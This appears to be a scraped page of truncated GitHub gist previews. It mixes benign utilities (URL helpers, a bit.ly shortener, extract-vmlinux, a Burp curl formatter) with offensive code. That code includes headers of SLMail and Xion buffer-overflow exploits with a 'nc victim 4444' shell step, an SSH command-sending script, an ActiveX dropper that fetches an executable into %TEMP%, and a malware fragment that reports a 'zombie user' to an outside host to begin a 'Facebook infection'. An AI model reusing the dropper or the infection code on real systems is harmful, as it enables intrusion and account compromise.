This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def urlencoded2dict(txt): | |
s = '{' + re.sub("([^=]+)=([^&]*)&?", r'"\1":"\2", ', txt) + '}' | |
return json.loads(s.replace(', }', '}')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Pexpect driven SSH Command sending script. | |
# Based on: | |
# Violent Python, by TJ O'Connor | |
# | |
import pexpect | |
from sys import argv, exit | |
PROMPT = ['#', '>>>', '> ', '\$ '] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Copy the below line to your bookmarklet: */ | |
javascript:(function(){MAX_URLS_TO_FETCH = 512; limit_reached = false; function decodeHtml(html) {txt = document.createElement('textarea'); txt.innerHTML = html; return txt.value; } String.prototype.endsWith = function(suffix) {return this.indexOf(suffix, this.length - suffix.length) !== -1; }; function normalizeUri(uri) {if (!uri || uri.length < 1) {return ''; } if(uri.toLowerCase().startsWith('javascript:') || uri.toLowerCase().startsWith('mailto:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('tel:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('#') ) {return ''; } orig = location.origin; if (uri.startsWith('http') && !uri.startsWith(orig)) {if (uri.substr(uri.indexOf(':')).startsWith(orig.substr(orig.indexOf(':')))) {return uri; } return ''; } if (uri.startsWith(orig)) {return uri; } if (uri.startsWith('//')) {return location.protocol + uri; } if (uri.startsWith('"') || uri.startsWith("'") ) {return '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer\ | |
# To use it: | |
# - firstly right click on request in BurpSuite | |
# - select "Copy as curl command" | |
# - then launch this script. | |
# As a result, you'll have a bit nicer curl command in your clipboard. | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Classic & old SLMail 5.5 PASS stack-based buffer overflow revisited for DEP Bypass | |
# via ROP to ZwSetInformationProcess with `leave`-based stack pivotting. | |
# Not overcoming ASLR, tested on Windows XP SP3 English. | |
# | |
# After launching, hit: $ nc victim 4444 | |
# | |
# Prepared for educational purposes, if someone wants to go through first DEP Bypasses on | |
# this particular vulnerability. | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
# Corelan.be Exploit Writing tutorial part 7. Unicode | |
# Example 1: r2 Studios Xion 1.0 121 build stack-based unicode overflow | |
# | |
# Example of unicode-compatible exploit. | |
# No ASLR compatible, no DEP either. | |
# Tested on Windows XP SP3. | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
# Simple bit-ly URL shortener. | |
# Usage: | |
# python bit-ly.py <URL> | |
# or by having a URL address in clipboard. | |
# | |
import bitly_api | |
from Tkinter import Tk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
var SRC = ""; | |
var CMDLINE = ""; | |
var out = Math.random().toString(36).substring(7) + ".exe"; | |
var axo = this.ActiveXObject; | |
var wshell = new axo("WScript.Shell"); | |
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out; | |
var xhr = new axo("MSXML2.XMLHTTP"); | |
xhr.onreadystatechange = function () { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# ---------------------------------------------------------------------- | |
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image | |
# | |
# Inspired from extract-ikconfig | |
# (c) 2009,2010 Dick Streefland <dick@streefland.net> | |
# | |
# (c) 2011 Corentin Chary <corentin.chary@gmail.com> | |
# | |
# Licensed under the GNU General Public License, version 2 (GPLv2). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function registerNewZombieUserAndStartFacebookInfection() { | |
var y = new window.XMLHttpRequest; | |
y.open("GET", "https://uye.io/php/start.php?ext=me&hash=" + hashParameter + "&user=" + username); | |
y.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); | |
y.send(); | |
y.onreadystatechange = function () { | |
if (4 == y.readyState && 200 == y.status) { | |
var l = JSON.parse(y.responseText); | |
config = l; | |
console.log(config); |